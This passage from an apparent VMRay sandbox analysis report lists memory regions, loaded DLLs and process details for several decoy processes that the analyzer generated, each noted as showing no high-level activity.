| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f0e0000 | 0x7f0e0000 | 0x7f1dffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f1e0000 | 0x7f1e0000 | 0x7f202fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f205000 | 0x7f205000 | 0x7f207fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f20b000 | 0x7f20b000 | 0x7f20bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f20c000 | 0x7f20c000 | 0x7f20efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f20f000 | 0x7f20f000 | 0x7f20ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #89: dishes neither nepal.exe
0
0
| Information | Value |
|---|---|
| ID | #89 |
| File Name | c:\program files (x86)\windows photo viewer\dishes neither nepal.exe |
| Command Line | "C:\Program Files (x86)\Windows Photo Viewer\dishes neither nepal.exe" |
| Initial Working Directory | C:\Program Files (x86)\Windows Photo Viewer\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb28 |
| Parent PID | 0x508 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C7C
0x
8D4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000cc0000 | 0x00cc0000 | 0x00ccffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000cd0000 | 0x00cd0000 | 0x00cd3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ce0000 | 0x00ce0000 | 0x00ce0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000cf0000 | 0x00cf0000 | 0x00d03fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000d10000 | 0x00d10000 | 0x00d4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d50000 | 0x00d50000 | 0x00e4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e50000 | 0x00e50000 | 0x00e53fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000e60000 | 0x00e60000 | 0x00e60fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000e70000 | 0x00e70000 | 0x00e71fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00e80000 | 0x00f3dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000f40000 | 0x00f40000 | 0x0103ffff | Private Memory | rw |
|
|
|
- |
| dishes neither nepal.exe | 0x01040000 | 0x01056fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000011a0000 | 0x011a0000 | 0x011a0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000011b0000 | 0x011b0000 | 0x011b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000011d0000 | 0x011d0000 | 0x011dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000011e0000 | 0x011e0000 | 0x0121ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001240000 | 0x01240000 | 0x0124ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001250000 | 0x01250000 | 0x013d7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000013e0000 | 0x013e0000 | 0x01497fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000014d0000 | 0x014d0000 | 0x014dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000014e0000 | 0x014e0000 | 0x01660fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001670000 | 0x01670000 | 0x02a6ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002a70000 | 0x02a70000 | 0x02b6ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74c00000 | 0x74c1cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74c20000 | 0x74c94fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x74ca0000 | 0x74d30fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f0e0000 | 0x7f0e0000 | 0x7f102fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f104000 | 0x7f104000 | 0x7f106fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f107000 | 0x7f107000 | 0x7f107fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f10c000 | 0x7f10c000 | 0x7f10efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f10f000 | 0x7f10f000 | 0x7f10ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #90: tenant.exe
0
0
| Information | Value |
|---|---|
| ID | #90 |
| File Name | c:\program files\windows mail\tenant.exe |
| Command Line | "C:\Program Files\Windows Mail\tenant.exe" |
| Initial Working Directory | C:\Program Files\Windows Mail\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1b8 |
| Parent PID | 0x508 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C78
0x
1F8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| tenant.exe | 0x002f0000 | 0x00306fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000bd0000 | 0x00bd0000 | 0x00bdffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000be0000 | 0x00be0000 | 0x00be3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000bf0000 | 0x00bf0000 | 0x00bf0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000c00000 | 0x00c00000 | 0x00c13fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000c20000 | 0x00c20000 | 0x00c5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c60000 | 0x00c60000 | 0x00d5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000d60000 | 0x00d60000 | 0x00d63fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000d70000 | 0x00d70000 | 0x00d70fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000d80000 | 0x00d80000 | 0x00d81fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00d90000 | 0x00e4dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000e90000 | 0x00e90000 | 0x00e90fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ea0000 | 0x00ea0000 | 0x00f57fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000f60000 | 0x00f60000 | 0x00f6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001070000 | 0x01070000 | 0x01073fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001080000 | 0x01080000 | 0x010bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000010c0000 | 0x010c0000 | 0x011bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000011c0000 | 0x011c0000 | 0x01347fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001350000 | 0x01350000 | 0x014d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001540000 | 0x01540000 | 0x0154ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001550000 | 0x01550000 | 0x0294ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002a30000 | 0x02a30000 | 0x02a3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a40000 | 0x02a40000 | 0x02b3ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74c00000 | 0x74c1cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74c20000 | 0x74c94fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x74ca0000 | 0x74d30fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f630000 | 0x7f630000 | 0x7f72ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f730000 | 0x7f730000 | 0x7f752fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f753000 | 0x7f753000 | 0x7f755fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f756000 | 0x7f756000 | 0x7f756fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f75c000 | 0x7f75c000 | 0x7f75efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f75f000 | 0x7f75f000 | 0x7f75ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #91: momentum.exe
0
0
| Information | Value |
|---|---|
| ID | #91 |
| File Name | c:\program files (x86)\msbuild\momentum.exe |
| Command Line | "C:\Program Files (x86)\MSBuild\momentum.exe" |
| Initial Working Directory | C:\Program Files (x86)\MSBuild\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x2e4 |
| Parent PID | 0x508 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C74
0x
340
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| momentum.exe | 0x00180000 | 0x00196fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000270000 | 0x00270000 | 0x0027ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x00283fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x00290fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000400000 | 0x00400000 | 0x00403fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000410000 | 0x00410000 | 0x00410fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000420000 | 0x00420000 | 0x00421fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000430000 | 0x00430000 | 0x00430fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x00443fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000450000 | 0x00450000 | 0x0054ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x005cffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x005d0000 | 0x0068dfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000790000 | 0x00790000 | 0x00917fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000950000 | 0x00950000 | 0x0095ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000960000 | 0x00960000 | 0x00ae0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000af0000 | 0x00af0000 | 0x01eeffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001ef0000 | 0x01ef0000 | 0x01fa7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001fb0000 | 0x01fb0000 | 0x01feffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002030000 | 0x02030000 | 0x0203ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002040000 | 0x02040000 | 0x0213ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74c00000 | 0x74c1cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74c20000 | 0x74c94fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x74ca0000 | 0x74d30fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007ec8d000 | 0x7ec8d000 | 0x7ec8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007ec90000 | 0x7ec90000 | 0x7ed8ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ed90000 | 0x7ed90000 | 0x7edb2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007edb5000 | 0x7edb5000 | 0x7edb5fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007edba000 | 0x7edba000 | 0x7edbafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007edbd000 | 0x7edbd000 | 0x7edbffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #92: pharmaceutical photoshop.exe
0
0
| Information | Value |
|---|---|
| ID | #92 |
| File Name | c:\program files (x86)\windows nt\pharmaceutical photoshop.exe |
| Command Line | "C:\Program Files (x86)\Windows NT\pharmaceutical photoshop.exe" |
| Initial Working Directory | C:\Program Files (x86)\Windows NT\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xad4 |
| Parent PID | 0x508 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C70
0x
2B8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000d60000 | 0x00d60000 | 0x00d6ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000d70000 | 0x00d70000 | 0x00d73fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d80000 | 0x00d80000 | 0x00d80fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000d90000 | 0x00d90000 | 0x00da3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000db0000 | 0x00db0000 | 0x00deffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000df0000 | 0x00df0000 | 0x00eeffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ef0000 | 0x00ef0000 | 0x00ef3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000f00000 | 0x00f00000 | 0x00f00fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000f10000 | 0x00f10000 | 0x00f11fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00f20000 | 0x00fddfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001020000 | 0x01020000 | 0x01020fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001030000 | 0x01030000 | 0x01033fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001040000 | 0x01040000 | 0x0104ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001080000 | 0x01080000 | 0x0108ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000010c0000 | 0x010c0000 | 0x011bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000012c0000 | 0x012c0000 | 0x01377fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001380000 | 0x01380000 | 0x013bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000013c0000 | 0x013c0000 | 0x013cffff | Private Memory | rw |
|
|
|
- |
| pharmaceutical photoshop.exe | 0x013d0000 | 0x013e6fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000013f0000 | 0x013f0000 | 0x01577fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001580000 | 0x01580000 | 0x01700fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001710000 | 0x01710000 | 0x02b0ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002b10000 | 0x02b10000 | 0x02c0ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74c00000 | 0x74c1cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74c20000 | 0x74c94fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x74ca0000 | 0x74d30fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ed30000 | 0x7ed30000 | 0x7ee2ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ee30000 | 0x7ee30000 | 0x7ee52fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ee55000 | 0x7ee55000 | 0x7ee57fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee58000 | 0x7ee58000 | 0x7ee58fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee5c000 | 0x7ee5c000 | 0x7ee5cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee5d000 | 0x7ee5d000 | 0x7ee5ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #93: song_biz_boats.exe
0
0
| Information | Value |
|---|---|
| ID | #93 |
| File Name | c:\program files (x86)\windows multimedia platform\song_biz_boats.exe |
| Command Line | "C:\Program Files (x86)\Windows Multimedia Platform\song_biz_boats.exe" |
| Initial Working Directory | C:\Program Files (x86)\Windows Multimedia Platform\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x820 |
| Parent PID | 0x508 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C6C
0x
274
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000dd0000 | 0x00dd0000 | 0x00ddffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000de0000 | 0x00de0000 | 0x00de3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000df0000 | 0x00df0000 | 0x00df0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e00000 | 0x00e00000 | 0x00e13fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000e20000 | 0x00e20000 | 0x00e5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e60000 | 0x00e60000 | 0x00f5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000f60000 | 0x00f60000 | 0x00f63fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000f70000 | 0x00f70000 | 0x00f70fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000f80000 | 0x00f80000 | 0x00f81fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00f90000 | 0x0104dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001050000 | 0x01050000 | 0x01050fff | Private Memory | rw |
|
|
|
